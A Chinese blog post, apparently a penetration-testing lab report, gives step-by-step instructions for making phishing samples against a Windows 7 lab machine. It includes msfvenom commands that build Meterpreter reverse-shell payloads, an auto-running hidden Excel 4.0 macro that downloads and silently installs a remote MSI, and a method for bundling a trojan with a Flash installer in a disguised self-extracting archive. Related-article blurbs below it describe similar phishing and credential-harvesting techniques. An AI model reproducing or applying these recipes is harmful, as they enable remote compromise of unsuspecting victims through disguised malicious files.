网络渗透 社会工程学钓鱼样本的制作

最新推荐文章于 2024-11-05 17:47:47 发布
最新推荐文章于 2024-11-05 17:47:47 发布
阅读量531 收藏 7
点赞数 2
文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/natsumoe/article/details/134887351
版权
本文详细描述了如何使用MicrosoftOffice宏和常规软件捆绑来创建远控木马,通过Excel宏调用恶意MSI文件,以及如何将米特工(Msf)生成的木马嵌入Flash文件进行钓鱼攻击。攻击者利用这些技巧在受害者机器上成功上线并执行命令。
摘要由CSDN通过智能技术生成

1、制作excel宏

msf生成恶意的msi文件

msfvenom -p windows/x64/meterpreter/reverse_tcp lhsot=kali的ip lport=监听的端口 -f msi -o diaoyexl.msi

然后msf建立监听

然后python在具有恶意的msi的文件夹下开启http服务 

然后开始制作excel

这里改一个更加容易让受害者相信的文件名

加点内容更容易上钩

选择插入宏表

选择插入宏表

第一行输入

=EXEC("msiexec /q /i http://192.168.100.132/diaoyexl.msi")

#记得把上面的ip改成你kali  http服务的ip

表示调用服务器上的msi

第二行输入

=HALT()

标识Excel 4.0宏结束

在A1 左上角改成Auto_Open让exl打开时候自动运行宏,然后回车

然后隐藏宏

另存为启用宏的工作表

保存成功后上传到肉鸡 win7虚拟机

运行后启用宏

成功上线

2、常规软件捆绑远控木马进行钓鱼

制作msf木马

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=kali的ip LPORT=监听端口 -f exe -o flash.exe

把木马和正常的flash 进行压缩

放在一起用winrar添加到压缩文件

这里解压前运行的是恶意远控木马,解压后运行的是正常的flash程序

为了逼真也可以修改图标

启动msf进行监听

然后把做好的恶意flash放到win7虚拟机中运行 

点击安装后就会上线了

成功执行命令

过一段时间就会运行正常的flash安装页面

NATSU_MOE
关注
[网络安全自学篇] 五十六.i春秋老师分享小白渗透之路及Web渗透技术总结
杨秀璋的专栏
03-05 2万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文讲解了Windows漏洞利用知识和DEP堆栈执行保护机制,通过构造ROP链来绕过DEP保护,并编写漏洞利用脚本并实现自动化攻击。本文将分析i春秋YOU老师的小白渗透之路,并结合作者系列文章总结Web渗透技术点,非常适合初学者学习,希望对您有所帮助~
[网络安全自学篇] 四十八.Cracer第八期——(1)安全术语、Web渗透流程、Windows基础、注册表及黑客常用DOS命令
热门推荐
杨秀璋的专栏
02-21 2万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了微软证书漏洞(CVE-2020-0601),并详细讲解了Windows验证机制、可执行文件签名复现及HTTPS劫持。本文将分享另一个主题——Cracer教程,第一篇文章将详细讲解安全术语、Web渗透流程和Windows基础、注册表及黑客常用DOS命令。基础性文章,希望对您有所帮助。
渗透·实验五
Gold_TANG的博客
12-09 194
本次实验,我们学习了社会工程学钓鱼样本制作,学习到了制作钓鱼文件并通过kali连接钓鱼文件获取权限。在Windows系统中,我们通过制作宏定义多重表,宏表内部添加恶意代码,我们将该excel宏表隐藏为正常的表传递给靶机,接着连接恶意代码后门,成功获取权限。另一种是创建压缩包,解压压缩包会执行我们的恶意文件,我们通过文件也能够获取到恶意文件。按照要求把木马flash.exe和正常的安装包进行压缩,制作好捆绑木马。学会制作简单的钓鱼样本并理解钓鱼样本木马的工作原理.在kali中建立监听,成功连接。
Msfvenom制作Windows木马程序
Louisnie
08-29 4209
Mefvenom简介: msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线 开始制作: 1:生成木马程序:msfvenom -p windows/meterpreter/reverse_tcp lhost=自己的ip lport=端口号(越大越好,不能超过65535) ...
Kali Linux—借助 SET+MSF 进行网络钓鱼、生成木马、获主机shell、权限提升、远程监控、钓鱼邮件等完整渗透测试(二)
weixin_72849553的博客
12-24 2474
将 Win 7靶机上的后门脚本、注册表注册项清除,Kali 攻击机则无法再随意入侵 Win 7 虚拟机靶机了,如下图所示:以上通过 SET + MSF 渗透工具,演示了如何生成木马、获得主机Shell、主机提权、远程桌面控制、日志清除、后门植入等完整的一次渗透测试攻击。
MSF&Powershell进行钓鱼攻击
weixin_44508748的博客
04-26 2541
一、Powershell配合MSF无文件攻击 实验环境: 靶机:win 7 >192.168.1.9 攻击机:kali>192.168.1.7 web服务器:win 10 > 192.168.1.6 本次实验的大致过程如下: MSF生成payload并放到靶机能够访问的服务器上,攻击者通过钓鱼等方式使靶机执行powershell代码,靶机反弹到msf监听的端口上建立会话,由此攻击...
社会工程学技术(钓鱼样本制作
2302_80154995的博客
09-06 831
社会工程学技术(钓鱼样本制作
网络渗透测试技术 实验报告 实验四 社会工程学技术
2302_80317339的博客
09-10 793
通过Excel宏实验我了解到Excel宏可以制作恶意文件,用户打开Excel文件,文件里的宏就会被触发,然后拿到对方电脑权限,并进行控制。在这次实验中,开启http服务时,因为没有在有msi的文件下开启,导致连接不成功。有了Excel宏实验的经验,在做常规软件捆绑远控木马进行钓鱼的实验时就很轻松了。本次实验原理运用了社会工程学攻击,社会工程学攻击是指诱使网络用户在线执行某些危险操作,它利用人性弱点获取目标系统有价值信息,当缺乏目标系统可用信息时,该方法是渗透测试者重要手段之一。(4)右键底部宏1,隐藏宏。
社会工程学盗取账密
m0_74168970的博客
11-05 95
6)随后访问攻击机IP,并且点击这个生成的网址,这里访问的就是工具自动生成的网页,登录账号密码后攻击机就显示了账号密码,随后会跳转到goole网站的页面,但是并没有登录。5)需要首先填入攻击机的IP,填kali的IP即可,我的是192.168.234.129,回车随后选择模版,这里我选择goole模版,回车后监听开启。3)选择2)网站攻击向量,随后选择3)凭证收割机攻击方法,这里是使用给定的网站,以欺骗用户输入个人敏感信息,如用户名、密码等。2)选择1)进入社会工程学攻击模块。图1-6 浏览器访问页面。
网络渗透测试技术
m0_64112419的博客
12-09 1037
只有深入了解目标用户的行为习惯、偏好和心理特点,我们才能制作出更具诱惑力和迷惑性的钓鱼样本,从而提高攻击的成功率。通过加强用户的安全培训和教育,提高他们对钓鱼攻击的识别能力和防范意识,可以有效降低钓鱼攻击的成功率,从而保护用户的信息安全。只有深入了解目标用户的行为特点和心理状态,我们才能更好地制作钓鱼样本,并增加其诱惑力,从而提高钓鱼攻击的成功率。因此,在进行钓鱼攻击前,我们需要投入更多的精力和时间来研究目标用户的行为习惯和心理特点,以确保钓鱼攻击的有效性和成功率。2.将正常的软件和恶意木马进行捆绑打包。
[网络安全自学篇] 六十六.Vulnhub靶机渗透之DC-1提权和Drupal漏洞利用(二)
杨秀璋的专栏
04-11 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。本文将讲解DC-1提权和Drupal漏洞利用,通过信息收集、CMS漏洞搜索、Metasploit反弹shell、提权及数据库爆破获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。
[网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)
杨秀璋的专栏
04-10 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可能利用此漏洞远程无需用户验证,执行恶意代码并获取机器的完全控制。本文将详细讲解Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。由于hack the box速度堪忧,作者选择了Vulnhub靶场,希望深入分析来
[网络安全自学篇] 六十.Cracer第八期——(2)五万字总结Linux基础知识和常用渗透命令
杨秀璋的专栏
03-19 1万+
作为Web渗透的初学者,Linux基础知识和常用命令是我们的必备技能,本文详细讲解了Linux相关知识点及Web渗透免了高龄。如果想玩好Kali或渗透,你需要学好Linux及相关命令,以及端口扫描、漏洞利用、瑞士军刀等工具。安全领域通常分为网络安全(Web渗透)和系统安全(PWN逆向)两个方向。非常基础的一篇文章,希望能够帮助到您!
【JavaEE初阶】网络原理(4)
2301_80898480的博客
11-02 1100
如有错误,欢迎指出~
第六章传输层协议、ACL
最新发布
2401_86349554的博客
11-05 662
第六章传输层协议、ACL
嵌入式通信协议:MODBUS简明学习笔记
weixin_73867577的博客
11-02 313
学习Modbus的简明学习笔记
tcp shutdown, fin_wait1, fin_wait2, close_wait, last_ack, 谢特!
Netfilter
10-31 2232
状态很奇怪,人们很难接受一个连接在非 ESTABLISHED 状态下正常传输数据,这会引来一堆咨询,但根据 TCP 状态机,这又是合理的,client 单向关闭了发送,FIN 就过去了,server 回复了 FIN,进入 CLOSE_WAIT,client 收到回复进入 FIN_WAIT_2,而 server 在 CLOSE_WAIT 下发数据,client 在 FIN_WAIT_2 下是完全合理的。但如果应用程序希望如此呢?TCP 的 RFC793 并未规定状态超时时间,为完整闭环这是合理的。
Linux:网络协议socket
Au_ust的博客
11-05 757
我们之前学的通信是本地进程间通信,如果我们想在网络间通信的话,就需要用到二者的ip地址,分别被称为源IP地址和目的IP地址,被存入ip数据包中,其次我们还需要遵循一些通信协议。TCP协议:传输层协议,有连接,可靠传输,面向字节流(无明确边界的字节序列),难UDP协议:传输层协议,无连接,不可靠传输,面向数据流(以数据包为单位),简单网络通信的本质也是进程间通信,你怎么知道你要和哪个进程通信?
速盾:sdk盾有什么用?
zhuguowang01的博客
11-02 233
SDK盾能够对SDK进行加密保护,使其在传输和使用过程中难以被窃取,从而有效保护开发者的知识产权和商业利益。然而,由于SDK的泄露或被盗取,开发者可能会面临知识产权纠纷、追责等问题,进而影响软件的开发进度和效率。通过使用SDK盾可以有效避免这些问题的发生,保护开发者的合法权益,提高软件的开发效率。SDK盾可以对SDK进行防篡改和防病毒的检测,确保SDK的完整性和安全性,有效减少软件遭受恶意攻击的风险。而使用SDK盾可以保证SDK的完整性和可靠性,确保软件正常运行和稳定性,提升用户的使用体验。
揭秘社会工程学攻击:防范策略与实战案例
广义的社会工程学则包括更复杂的策略,如网络钓鱼、恶意软件传播、身份盗用等,这些都利用了人的认知偏差和好奇心。防范社会工程学攻击的关键在于提高安全意识和培养正确的思维方式。对于个人而言,这包括: 1. **...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值